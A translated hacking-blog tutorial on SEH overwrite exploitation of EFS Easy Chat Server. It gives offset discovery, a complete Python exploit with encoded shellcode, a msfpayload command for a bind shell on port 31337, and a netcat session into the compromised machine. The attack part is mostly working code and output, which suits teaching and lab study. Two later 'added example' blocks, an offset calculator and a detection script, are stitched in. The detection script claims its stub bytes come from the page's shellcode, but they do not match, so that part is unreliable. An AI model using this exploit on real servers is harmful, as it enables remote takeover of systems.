Posted by kecoak on Jan 31, 2010

SEH Overwrite for n00b

Recently, in one of the security forums, there was a discussion about SEH overwrite. SEH overwrite is one of the favourite methods commonly used to exploit applications on the Microsoft Windows operating system. And since it is Saturday night (hey… what's the correlation??), let's talk about this.

We will not go into detail about what SEH is; maybe it will be covered some other time. What matters here is that SEH (Structured Exception Handling) is one of the technologies shipped with the Microsoft Windows operating system, and it can be leveraged when exploiting a bug, particularly stack-based memory corruption. You could say that SEH overwrite is a technique built on application bugs that live in the stack area.

The principle is this: if we can make an application crash, the crash happens in the stack area (example: stack-based buffer overflow), and when the application crashes it turns out the SEH chain can be overwritten, then most likely we can take over the system using the SEH overwrite technique.

The application used as the target is EFS Easy Chat Server; you can look at an example exploit here, and download the vulnerable version of the application here. I picked this application because I consider it the easiest one for showing the SEH overwrite process on its bug, and testing on several operating systems (Windows 2000 through Windows XP SP3) gave stable results, so it is a good fit for an article.

If we look at the various ready-made exploits for this application, everything looks easy, so we will assume that an RCE (Remote Code Execution) exploit is not yet known. The only advisory, and perhaps the only exploit in circulation, uses the DoS method, meaning the server crashes and shuts down, like this example exploit.

For your information, when a bug is found, two parties will claim that the bug cannot be exploited to obtain RCE: the vendor (usually where operating-system bugs are concerned) and newcomers to the field of exploitation. It is true that not every bug can be used to get a shell, but usually when a bug only results in a DoS according to the PoC (Proof of Concept), all kinds of hackers will try to turn that bug into one that can be used to gain RCE. One example is when the Immunity team managed to turn a bug in SMB2 that originally only caused a DoS into one that could be exploited to get a shell.

Gentlemen, start your debugger

In the DoS exploit example above, we know that the overflow happens in the following part:

...
$A=str_repeat('A',999);
...
fputs($link,"GET /chat.ghp?username=$A&password=$A&room=1&sex=2 HTTP/1.1\r\nHost: $host\r\n\r\n");

The overflow occurs when the application processes its authentication function; in this case we take the username part. That means if we send the request above with 999 'A' characters in the username, the server will crash. For this article I will keep the programming part to a minimum, so we will try the exploitation manually using telnet (please, don't ask me how to use telnet), and the number of characters sent will be limited to 750 (somehow the terminal I use cannot accept the input when 999 characters are sent),

$ telnet 172.16.30.129 80
Trying 172.16.30.129...
Connected to 172.16.30.129.
Escape character is '^]'.
GET /chat.ghp?username=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&password=1234567&room=1&sex=2 HTTP/1.1
Host:172.16.30.129

Connection closed by foreign host.

Easy Chat Server accepts requests at IP address 172.16.30.129, and when the request above is sent the application crashes and is terminated by Windows. This condition is often called a DoS.

We send the request above once more, but this time with the Easy Chat Server application being monitored by a debugger (attached). The debugger I use for this example is Immunity Debugger,

We can see that the crash occurs at,

MOV AL, BYTE PTR DS:[EDX]

Register EDX has been overwritten with a run of 'A' characters, so executing this instruction results in an "Access Violation" because the program tries to read the invalid memory location DS:[41414141],

DS:[41414141]=???
AL=FF

Next we find out whether the SEH chain structure has also been overwritten at this point,

Good. The next step is to find out 2 important things:

1. How many bytes / characters are needed to make the application crash (in this case, the characters that overwrite register EDX)?
2. How many bytes / characters are needed to overwrite the SEH chain?

There are various ways, but the easiest is to use Metasploit to generate the characters and Peter Van Eeckhoutte's Immunity Debugger plugin to find the location of the bytes above (byakugan also works, as in the previous post, but this time we use Immunity Debugger 😉).

$ ./pattern_create.rb 750
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9

Use the pattern_create.rb tool from Metasploit to generate a unique string of 750 bytes, then use that string to replace the run of 'A' characters previously sent to the server,

$ telnet 172.16.30.129 80
Trying 172.16.30.129...
Connected to 172.16.30.129.
Escape character is '^]'.
GET /chat.ghp?username=Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9&password=1234567&room=1&sex=2 HTTP/1.1
Host:172.16.30.129

Here is the result from the debugger,

When the application crashes, we use the "!pvefindaddr findmsp" plugin command to find where the Metasploit pattern we sent above ended up when it overwrote the contents of the stack,

Here is the part that shows the plugin's result more clearly,

0BADF00D   -------------------------------------------------------------------------
0BADF00D   Searching for metasploit pattern references
0BADF00D   -------------------------------------------------------------------------
0BADF00D   [1] Checking register addresses and contents
0BADF00D   ============================================
0BADF00D   Register EDI is overwritten with Metasploit pattern at position 252
0BADF00D   Register ECX is overwritten with Metasploit pattern at position 256
0BADF00D   [2] Checking seh chain
0BADF00D   ======================
0BADF00D    - Checking seh chain entry at 0x010b6ddc, value 68413368
0BADF00D      => record is overwritten with Metasploit pattern at position 220
0BADF00D   -------------------------------------------------------------------------

The result above gives us the answers to the earlier questions,

1. Register EDI is overwritten after 252 characters. So we must send at least 252 characters for the application to crash and for program flow to be redirected to SEH.
2. The SEH record is overwritten after 220 characters.

The term "at position" in Peter's plugin output above is actually a bit ambiguous, but I assume it counts from 0, so when the result says "at position 220" it means the record is overwritten by the 221st character (after 220 characters).

A little bit of theory

The "n-th character" is usually called the "offset", so we will use this term from now on. The SEH record is overwritten at offset 221, which means Next SEH is overwritten at offset 217. Here is the arrangement of Next SEH and SEH:

[ Next SEH ] – [ SEH ]

Next SEH and SEH are 4 bytes each, so if we know SEH is at offset 221, then with a bit of arithmetic we know Next SEH can be overwritten at offset 217, which means that if we send 216 characters, the next 8 characters will overwrite Next SEH and SEH.

[Junk * 216] – [Next SEH] – [SEH]

If any of you are curious and want to try sending only 224 characters to see the result in the debugger, you will learn a very important lesson: the server will not crash. Why? Because the offset that overwrites EDX and makes the application crash with an "access violation" is offset 253 (look again at the pvefindaddr result above). That is why sending fewer than 253 characters will not crash the application, and the application will not be redirected to SEH. Therefore we will crash the application with the following form:

[Junk * 216] – [Next SEH] – [SEH] – [Payload/Shellcode]

We will place the shellcode after SEH, so the program flow becomes the following:

1. The server crashes because EDX is overwritten by 4 bytes of characters located in the shellcode (offset 253).
2. Because the server crashes, program flow is redirected to the SEH record by the Windows operating system.
3. We replace the SEH record with a memory address that contains the opcodes "pop, pop, ret".
4. Program flow (EIP) executes SEH, but because of the "pop, pop, ret" opcodes at SEH, EIP is taken to Next SEH.
5. Next SEH contains an opcode that points to the shellcode location, in this case "jump 6 bytes" forward.
6. EIP executes the shellcode.

The last step is to find the location of "pop, pop, ret" opcodes in memory inside a library that is not protected by /SafeSEH, and to put the "jump 6 bytes forward" opcode into Next SEH. For the "pop, pop, ret" location we can use the "pvefindaddr" plugin again,

0BADF00D   [nosafeseh] Getting safeseh status for loaded modules :
0BADF00D   Safeseh unprotected modules :
0BADF00D    * 0x10000000 - 0x10027000 : SSLEAY32.dll
0BADF00D    * 0x00490000 - 0x00561000 : LIBEAY32.dll
0BADF00D    * 0x76fc0000 - 0x76fc6000 : rasadhlp.dll
0BADF00D    * 0x71ad0000 - 0x71ad9000 : WSOCK32.dll
0BADF00D    * 0x00400000 - 0x00489000 : EasyChat.exe
0BADF00D    * 0x77b20000 - 0x77b32000 : MSASN1.dll
0BADF00D    * 0x76fb0000 - 0x76fb8000 : winrnr.dll
0BADF00D
0BADF00D
0BADF00D   --------------------------------------------------------------
0BADF00D   Search for pop pop ret combinations started - please wait...
0BADF00D   --------------------------------------------------------------
0BADF00D   Safeseh unprotected modules :
0BADF00D    * 0x10000000 - 0x10027000 : SSLEAY32.dll
0BADF00D    * 0x00490000 - 0x00561000 : LIBEAY32.dll
0BADF00D    * 0x76fc0000 - 0x76fc6000 : rasadhlp.dll
0BADF00D    * 0x71ad0000 - 0x71ad9000 : WSOCK32.dll
0BADF00D    * 0x00400000 - 0x00489000 : EasyChat.exe
0BADF00D    * 0x77b20000 - 0x77b32000 : MSASN1.dll
0BADF00D    * 0x76fb0000 - 0x76fb8000 : winrnr.dll
0BADF00D   --------------------------------------------------------------
0BADF00D   Search complete
0BADF00D   Output written to ppr.txt
0BADF00D   Found 116 address(es) in non-safeseh protected modules, out of 11418 addresses

To make the exploit more reliable, we look for the "pop, pop, ret" location in a module / library that ships with EFS Easy Chat Server itself. With the command "!pvefindaddr nosafeseh" we get the list of modules that were not compiled with /SafeSEH, and we can see that 2 libraries ship with Easy Chat Server: ssleay32.dll and libeay32.dll. So we can focus the "pop, pop, ret" search on those libraries; the result above for ssleay32.dll was obtained with the command "!pvefindaddr p esi SSLEAY32.dll".

From the list of memory locations above we pick one, 0x1001b2b6. When we send it in the request, don't forget to convert it to little-endian format, which gives "\xb6\xb2\x01\x10". Next is the opcode for "jump forward 6 bytes". The opcode for a short jump is EB, and the displacement for 6 bytes is 06, so the instruction that makes EIP jump 6 bytes forward to execute the shellcode is EB 06.

[ "A" * 216 (216 bytes) ] + [ \xeb\x06\x90\x90 (4 bytes) ] + [ \xb6\xb2\x01\x10 (4 bytes) ] + [ shellcode ]

If someone asks "why jump 6 bytes forward?", look again at the buffer contents above. When EIP is taken to Next SEH after executing "pop, pop, ret" at SEH, EIP has to jump over SEH (4 bytes) and the remaining 2 bytes of Next SEH. The EB06 opcode only takes 2 bytes of the Next SEH slot, so the remaining 2 bytes can be filled with NOPs (0x90), and those NOP bytes must be jumped over as well. So the total number of bytes to skip is 4+2 = 6 (what's this, elementary school math?).
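As an added example (my own code, not from the original post), here is a small Python reimplementation of the arithmetic behind the offsets in the theory section and the 6-byte jump above: it regenerates the Metasploit-style pattern, maps the value findmsp reported in the SEH record (68413368) back to its 0-based offset, and derives the junk length and short-jump displacement; the function names are my own.

```python
import string
import struct

UPPER, LOWER, DIGITS = string.ascii_uppercase, string.ascii_lowercase, string.digits


def pattern_create(length):
    """Cyclic pattern in the style of Metasploit's pattern_create.rb
    ("Aa0Aa1Aa2..."): every 4-byte window is unique, so a dword read from a
    register or from the SEH record maps back to exactly one offset."""
    out = []
    for up in UPPER:
        for lo in LOWER:
            for d in DIGITS:
                out.append(up + lo + d)
                if 3 * len(out) >= length:
                    return "".join(out)[:length]
    return "".join(out)[:length]


def pattern_offset(pattern, reg_value):
    """0-based offset at which a 32-bit value shown by the debugger sits in the
    pattern. The debugger prints the dword as a number (e.g. 68413368), but it
    was stored little-endian on the stack, so re-serialise it that way first."""
    needle = struct.pack("<I", reg_value).decode("latin-1")
    idx = pattern.find(needle)
    if idx < 0:
        raise ValueError("0x%08x does not come from the pattern" % reg_value)
    return idx


def seh_layout(seh_offset, crash_offset):
    """Derive the post's [junk][nSEH][SEH][shellcode] layout from the 0-based
    offset of the SEH handler slot and the 0-based offset of the 4 bytes whose
    dereference raises the access violation."""
    nseh_offset = seh_offset - 4         # the record is [nSEH][SEH], 4 bytes each
    shellcode_offset = seh_offset + 4    # payload starts right after the handler slot
    # "jmp short" is 2 bytes (EB xx) and its displacement counts from the byte
    # after the instruction: skip the 2 pad bytes of nSEH plus the 4 bytes of SEH
    displacement = shellcode_offset - (nseh_offset + 2)
    return {
        "junk": nseh_offset,
        "nseh_offset": nseh_offset,
        "seh_offset": seh_offset,
        "shellcode_offset": shellcode_offset,
        "jmp_short_displacement": displacement,
        # step 1 of the flow above only holds if the faulting bytes lie in the payload
        "crash_in_shellcode": crash_offset >= shellcode_offset,
    }


if __name__ == "__main__":
    pat = pattern_create(750)
    seh = pattern_offset(pat, 0x68413368)   # value findmsp reported in the SEH record
    edi = 252                               # "Register EDI ... at position 252"
    print("SEH slot at 0-based offset", seh)  # 220, i.e. the 221st byte
    print(seh_layout(seh, edi))
```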

Payload

Junk done, Next SEH done, SEH done; the last piece is the shellcode. To generate the shellcode we can use Metasploit again, this time with the msfencode tool.

$ ./msfpayload windows/exec CMD="c:\windows\system32\calc.exe" R | ./msfencode -e x86/alpha_upper -b "\x00" -t c
[*] x86/alpha_upper succeeded with size 511 (iteration=1)


Show Ur Spl0it

At the start of this article I promised to use as little programming as possible, but to send the shellcode we need some programming. The reason is that with telnet the shellcode bytes get altered by the time they reach Easy Chat Server. We will use Python to define the variables junk, next seh, seh and shellcode. A socket opens a connection to port 80 on the server and sends a request containing those variables, exploiting the 'username' variable of the authentication.

#!/usr/bin/python
# Python 2 script: str values are raw bytes, which is what the request needs.

import struct
import socket

junk = "A" * 216                            # filler up to the SEH record (offset 216, 0-based)
next_seh = "\xeb\x06\x90\x90"               # jmp short +6, padded with two NOPs
seh = struct.pack("<I", 0x1001b2b6)         # pop/pop/ret in ssleay32.dll, little-endian
shellcode = (                               # msfencode output from above (calc.exe)
"\x89\xe0\xd9\xc8\xd9\x70\xf4\x5f\x57\x59\x49\x49\x49\x49\x43"
"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34"
"\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41"
"\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58"
"\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4d\x38\x4b\x39\x43\x30"
"\x45\x50\x43\x30\x45\x30\x4d\x59\x4d\x35\x46\x51\x49\x42\x43"
"\x54\x4c\x4b\x46\x32\x50\x30\x4c\x4b\x50\x52\x44\x4c\x4c\x4b"
"\x46\x32\x45\x44\x4c\x4b\x44\x32\x51\x38\x44\x4f\x4e\x57\x51"
"\x5a\x46\x46\x46\x51\x4b\x4f\x46\x51\x49\x50\x4e\x4c\x47\x4c"
"\x43\x51\x43\x4c\x45\x52\x46\x4c\x51\x30\x4f\x31\x48\x4f\x44"
"\x4d\x45\x51\x49\x57\x4d\x32\x4c\x30\x50\x52\x50\x57\x4c\x4b"
"\x50\x52\x42\x30\x4c\x4b\x51\x52\x47\x4c\x45\x51\x4e\x30\x4c"
"\x4b\x51\x50\x42\x58\x4b\x35\x4f\x30\x44\x34\x50\x4a\x45\x51"
"\x48\x50\x50\x50\x4c\x4b\x47\x38\x45\x48\x4c\x4b\x46\x38\x51"
"\x30\x43\x31\x48\x53\x4d\x33\x47\x4c\x51\x59\x4c\x4b\x50\x34"
"\x4c\x4b\x43\x31\x49\x46\x46\x51\x4b\x4f\x46\x51\x49\x50\x4e"
"\x4c\x49\x51\x48\x4f\x44\x4d\x45\x51\x48\x47\x47\x48\x4b\x50"
"\x44\x35\x4b\x44\x43\x33\x43\x4d\x4c\x38\x47\x4b\x43\x4d\x47"
"\x54\x44\x35\x4d\x32\x51\x48\x4c\x4b\x50\x58\x47\x54\x43\x31"
"\x49\x43\x45\x36\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b\x46\x38\x45"
"\x4c\x43\x31\x48\x53\x4c\x4b\x45\x54\x4c\x4b\x45\x51\x4e\x30"
"\x4c\x49\x50\x44\x47\x54\x51\x34\x51\x4b\x51\x4b\x43\x51\x50"
"\x59\x50\x5a\x46\x31\x4b\x4f\x4b\x50\x50\x58\x51\x4f\x51\x4a"
"\x4c\x4b\x44\x52\x4a\x4b\x4b\x36\x51\x4d\x42\x4a\x43\x31\x4c"
"\x4d\x4c\x45\x48\x39\x45\x50\x43\x30\x43\x30\x46\x30\x45\x38"
"\x46\x51\x4c\x4b\x42\x4f\x4c\x47\x4b\x4f\x48\x55\x4f\x4b\x4a"
"\x50\x4f\x45\x4e\x42\x50\x56\x42\x48\x49\x36\x4d\x45\x4f\x4d"
"\x4d\x4d\x4b\x4f\x49\x45\x47\x4c\x43\x36\x43\x4c\x45\x5a\x4b"
"\x30\x4b\x4b\x4b\x50\x44\x35\x44\x45\x4f\x4b\x51\x57\x44\x53"
"\x43\x42\x42\x4f\x42\x4a\x43\x30\x50\x53\x4b\x4f\x49\x45\x42"
"\x43\x47\x4a\x51\x4c\x43\x47\x42\x49\x42\x4e\x42\x44\x42\x4f"
"\x44\x37\x42\x53\x51\x4c\x44\x33\x43\x49\x42\x53\x44\x34\x45"
"\x35\x42\x4d\x50\x33\x50\x32\x51\x4c\x43\x53\x43\x51\x42\x4c"
"\x42\x43\x46\x4e\x45\x35\x44\x38\x45\x35\x43\x30\x45\x5a\x41"
"\x41")

# The overflowing field is the username parameter of the authentication request.
request  = "GET /chat.ghp?username=" + junk + next_seh + seh + shellcode + "&password=1234567&room=1&sex=2 HTTP/1.1\r\n"
request += "Host: 172.16.30.129\r\n"

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(('172.16.30.129', 80))
sock.send(request + "\r\n\r\n")
sock.close()

The result is that the Easy Chat Server application is terminated and calc.exe pops up,

Wait, where’s my shell?

Running calc.exe as above is the typical standard shellcode for proving that our exploit flow works properly. To get a shell on the exploited server, it is enough to replace the shellcode,

$ ./msfpayload windows/shell_bind_tcp LPORT=31337 R | ./msfencode -e x86/alpha_upper -b "\x00" -t c
[*] x86/alpha_upper succeeded with size 753 (iteration=1)


By replacing the shellcode part of the spl0it above, once execution finishes the target operating system will open a shell on port 31337,

$ nc 172.16.30.129 31337
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Strazytski\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 8C23-6511

 Directory of C:\Documents and Settings\Strazytski\Desktop

01/29/2010  11:14 AM    <DIR>          .
01/29/2010  11:14 AM    <DIR>          ..
01/28/2010  07:37 PM         2,359,739 camshot-v1.2.exe
01/29/2010  07:28 AM               670 Easy Chat Server.lnk
01/26/2010  04:47 PM               575 IDA Pro Advanced (32-bit).lnk
01/26/2010  04:47 PM               587 IDA Pro Advanced (64-bit).lnk
01/26/2010  01:30 PM        91,799,890 IDAPro5.5.rar
04/22/2009  01:36 PM             1,059 Microsoft Visual Studio 2008.lnk
04/26/2009  06:36 PM               666 OLLYDBG.lnk
01/18/2010  11:39 PM    <DIR>          vuln software
01/09/2010  06:56 PM               494 windbg.lnk
               8 File(s)     94,163,680 bytes
               3 Dir(s)  22,697,357,312 bytes free
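Before wrapping up, the same request seen from the server's side. This is an added example, not code from the original post or from the Easy Chat Server exploit: it splits a raw request to /chat.ghp into its parameters without URL-decoding, flags a username that is oversized or carries non-printable bytes, and looks for the x86/alpha_upper decoder loop that the msfencode output above starts with (the printable run VTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJI, recovered by decoding the first bytes of that output). The 64-byte username limit, the host name chat.example and the two sample requests are constructed assumptions; the only bytes taken from the page are the first 67 bytes of the encoded payload, which are the decoder stub and not the bind shell itself.

```python
"""Request-side detection for the /chat.ghp username overflow shown above.

Added example, not code from the original post or from the Easy Chat Server
exploit. The username length limit and the sample requests are constructed
assumptions; the decoder-stub signature is recovered from the msfencode
output printed on the page.
"""
import re
import string

# Assumed sane upper bound for a chat username (constructed threshold).
MAX_USERNAME_LEN = 64

# Bytes a legitimate form field is expected to contain.
PRINTABLE = frozenset(string.printable.encode())

# First 67 bytes of the page's "msfencode -e x86/alpha_upper" output: the
# GetPC stub plus the self-decoding loop that precedes the encoded payload.
PAGE_STUB_LITERAL = (
    r'"\x89\xe3\xdb\xd7\xd9\x73\xf4\x5b\x53\x59\x49\x49\x49\x49\x43"'
    r'"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34"'
    r'"\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41"'
    r'"\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58"'
    r'"\x50\x38\x41\x43\x4a\x4a\x49"'
)

# The decoder loop as it reads once decoded: this printable run is the part
# worth matching in traffic, independent of whatever payload follows it.
ALPHA_UPPER_STUB = b"VTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJI"


def c_string_to_bytes(literal: str) -> bytes:
    """Decode the \\x.. escapes of a C string literal (quotes and whitespace ignored)."""
    return bytes(int(h, 16) for h in re.findall(r"\\x([0-9a-fA-F]{2})", literal))


def split_request(raw: bytes):
    """Return (path, {param: value}) from the request line, without URL-decoding,
    so payload bytes are inspected exactly as they arrive on the wire."""
    request_line = raw.split(b"\r\n", 1)[0]
    parts = request_line.split(b" ")
    if len(parts) < 2:
        return b"", {}
    path, _, query = parts[1].partition(b"?")
    params = {}
    for pair in query.split(b"&"):
        key, _, value = pair.partition(b"=")
        params[key] = value
    return path, params


def inspect_request(raw: bytes) -> list:
    """Return a list of findings for one raw HTTP request; empty means clean."""
    path, params = split_request(raw)
    if path != b"/chat.ghp":
        return []
    username = params.get(b"username", b"")
    findings = []
    if len(username) > MAX_USERNAME_LEN:
        findings.append(f"username is {len(username)} bytes, limit {MAX_USERNAME_LEN}")
    if any(b not in PRINTABLE for b in username):
        findings.append("username carries non-printable bytes")
    if ALPHA_UPPER_STUB in username:
        findings.append("x86/alpha_upper decoder stub found in username")
    return findings


def sample_requests() -> dict:
    """Constructed requests: an ordinary login and one shaped like the exploit."""
    benign = (b"GET /chat.ghp?username=alice&password=1234567&room=1&sex=2 HTTP/1.1\r\n"
              b"Host: chat.example\r\n\r\n")
    oversized = b"A" * 300 + c_string_to_bytes(PAGE_STUB_LITERAL)
    hostile = (b"GET /chat.ghp?username=" + oversized +
               b"&password=1234567&room=1&sex=2 HTTP/1.1\r\nHost: chat.example\r\n\r\n")
    return {"benign": benign, "hostile": hostile}


if __name__ == "__main__":
    for name, raw in sample_requests().items():
        print(name, inspect_request(raw) or ["clean"])
```

The length check alone is enough to catch the request built earlier, since the junk needed to reach the handler is far longer than any real username; the stub match is the more specific signal and survives even when the padding is shortened, while the non-printable check covers the GetPC bytes that the alpha_upper encoder cannot avoid emitting.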

Well, that's all for now folks. There are a great many applications that can be exploited using the SEH overwrite technique. After practicing with 4-5 pieces of software, you will surely grasp the concept easily and be able to apply it to bugs in other software.

Have fun with your pop+pop+ret :).


4 Responses to “SEH Overwrite for n00b”

  1. That's a really good tutorial!

    Quick tip: instead of running !pvefindaddr findmsp, you can also run !pvefindaddr suggest (which will run findmsp first, will then analyze the results & show how possible exploit code would look like)

    Latest version of pvefindaddr can be downloaded from http://www.corelan.be:8800/index.php/security/pvefindaddr-py-immunity-debugger-pycommand/

  2. By the way: you can also create a metasploit pattern in Immunity:
    example: !pvefindaddr pattern_create 750

    All output generated by !pvefindaddr functions is written to files too… when creating a metasploit pattern, the output is written to mspattern.txt (in the Immunity Debugger program folder)

  3. byteskrew says:

    Hi Peter, glad you visited our blog, thx for the suggestion regarding pvefindaddr :). I just realized about the new pvefindaddr some time ago; I used the old version, which I downloaded after our last emails, for writing this article.

    ~ cyberheb

  4. gunslinger_ says:

    Wow this is cool, thx for sharing…
    Peter is here too, very nice 😉
